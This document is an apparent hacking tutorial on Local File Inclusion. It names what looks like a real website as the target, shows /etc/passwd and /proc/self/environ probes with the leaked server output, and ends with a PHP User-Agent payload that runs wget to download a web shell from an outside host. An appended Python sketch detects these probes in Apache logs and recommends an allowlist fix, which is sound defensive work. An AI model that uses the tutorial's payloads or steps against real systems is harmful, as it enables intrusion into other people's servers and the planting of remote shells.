Local File Inclusion Example 1
Step 1) Find an LFI-vulnerable site
Example: http://somesite.com/something.php?something=something.something
Step 2) To find out whether the given site is vulnerable to LFI, insert /etc/passwd as the parameter value and look at the result
Example: http://egenerationglobal.com/index.php?page=/etc/passwd
If the page returns the contents of /etc/passwd, we can be sure that the site is vulnerable to LFI (Local File Inclusion)
Step 3) Request /proc/self/environ through the same parameter. The response shows the environment of the web server process, including the request headers:
http://egenerationglobal.com/index.php?page=/proc/self/environ
DOCUMENT_ROOT=/home/egenerat/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5
HTTP_CONNECTION=keep-alive
HTTP_HOST=egenerationglobal.com
HTTP_KEEP_ALIVE=115
HTTP_USER_AGENT=Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
PATH=/bin:/usr/bin
QUERY_STRING=page=/proc/self/environ
REDIRECT_STATUS=200
REMOTE_ADDR=183.82.180.221
REMOTE_PORT=7173
REQUEST_METHOD=GET
REQUEST_URI=/index.php?page=/proc/self/environ
SCRIPT_FILENAME=/home/egenerat/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=173.192.220.102
SERVER_ADMIN=webmaster@egenerationglobal.com
SERVER_NAME=egenerationglobal.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.1
SERVER_SIGNATURE=Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8 Server at egenerationglobal.com Port 80
SERVER_SOFTWARE=Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4
HTTP_USER_AGENT in this output is taken from the request header. Now change the User-Agent to some PHP code:
<?php system('wget "http://www.gurujiathome.com/1.txt" -O shell.php'); ?>
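Seen from the server side, the steps above leave a recognisable trail in the Apache access log: a file path in the page parameter, then PHP code in the User-Agent. The following detection sketch is an added example, not part of the original post; the log lines are constructed and the names inspect_line and suspects are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<agent>.*)"$'
)
# A page parameter should name a page, not an absolute system path or a traversal.
LFI_PATH_RE = re.compile(r'^/(etc|proc)/|\.\./', re.I)
# A real browser never sends a PHP open tag in its User-Agent.
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.I)

# Constructed sample log lines (documentation IP ranges, harmless PHP placeholder).
SAMPLE = [
    '198.51.100.7 - - [10/May/2011:09:59:40 +0000] "GET /index.php?page=about HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"',
    '192.0.2.10 - - [10/May/2011:10:00:01 +0000] "GET /index.php?page=/etc/passwd HTTP/1.1" '
    '200 1543 "-" "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"',
    '192.0.2.10 - - [10/May/2011:10:00:30 +0000] "GET /index.php?page=%2Fproc%2Fself%2Fenviron '
    'HTTP/1.1" 200 2210 "-" "<?php /* constructed placeholder */ ?>"',
]


def inspect_line(line):
    """Return (client_ip, findings) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = set()
    # parse_qsl percent-decodes values, so %2Fetc%2Fpasswd is caught as well.
    for _name, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        if LFI_PATH_RE.search(value):
            findings.add("file-path-in-parameter")
    if PHP_TAG_RE.search(m["agent"]):
        findings.add("php-code-in-user-agent")
    return m["ip"], findings


def suspects(lines):
    """Group findings by client IP; an IP showing both findings matches the sequence above."""
    per_ip = {}
    for ip, findings in filter(None, map(inspect_line, lines)):
        if findings:
            per_ip.setdefault(ip, set()).update(findings)
    return per_ip
```

Detection only flags the probes. The fix is on the application side: map the page parameter to a fixed allowlist of includable files instead of passing it to include.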